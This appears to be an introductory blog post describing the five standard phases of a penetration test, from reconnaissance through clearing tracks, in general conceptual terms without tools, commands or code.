When we talk about penetration tests, a lot of people think that it is just a matter of starting our computers, running a few tools against the target, doing a bit of magic and, done, the pentester discovers a few vulnerabilities. But the truth is far from this point of view; maybe in films it is something like that, but not in real life.

A pentest is a well-defined process, with methodologies like OSSTMM, OWASP and some others. All of them define concrete steps and procedures that a pentester should follow to perform the task properly.

One of the things that is well defined is the set of phases of a pentest, each one specifying what needs to be done and when it needs to be done. The tools used to complete each of these phases are not important in this article; here, only the process matters.

We can find five different phases in a pentest, each one with its boundaries, objectives and goals well defined. These five phases are:

  • Reconnaissance
  • Scanning
  • Gaining access
  • Maintaining access
  • Clearing tracks

Let's see a short introduction to each of the phases.

Reconnaissance

Reconnaissance refers to the preparatory phase where an attacker seeks to gather information about a target prior to launching the attack. In other words, to find all the information at our fingertips. Attackers are going to use all the public sources they can reach to find information about the target. And we are not talking just about the company, we are talking about employees, business, operations, network, systems, competitors, … everything we can learn about our target. We can use web pages, social networks, social engineering, … The objective is to know as much as we can about the victim and the elements around it.

We can find two types of reconnaissance:

  • Passive: Involves acquiring information without directly interacting with the target.
  • Active: Involves interacting with the target directly by any means.

Scanning

Scanning refers to a pre-attack phase where the attacker scans the network for specific information on the basis of the information gathered during reconnaissance. In general, in this step we are going to use port scanners, vulnerability scanners and similar tools to obtain information about the target environment: live machines, open ports on each of those machines, services running, OS details, … All this information will allow us to launch the attack.

Gaining access

Gaining access refers to the point where the attacker obtains access to a machine or application inside the target's network. Part of this phase is when the attacker tries to escalate privileges to obtain complete control of the system or, based on the access the attacker has, tries to compromise other systems in the network. Here we have multiple tools and different possibilities like password cracking, denial of service, buffer overflows, session hijacking, …

Maintaining access

Maintaining access refers to the phase where the attacker tries to retain ownership of the system and make future access to the compromised system easier, especially in case the way the attacker used to compromise the system gets fixed. The attacker can do multiple things like creating users in the system, installing their own applications and hiding them, or installing backdoors, rootkits or trojans. In some cases the attacker can even secure the compromised machine to prevent other attackers from controlling it.

Clearing tracks

Clearing tracks refers to the activities carried out by an attacker to hide malicious acts. In this phase, the attacker tries to remove all the evidence of the machine having been compromised, trying to avoid, in the first place, detection and, in the second place, to obstruct prosecution.

These are the different phases of a pentest, and any service offered should perform all of them properly. In addition, one of the best things about performing all the phases correctly and in the right order is that we can use the information found in a previous phase to complete the next one.

See you.
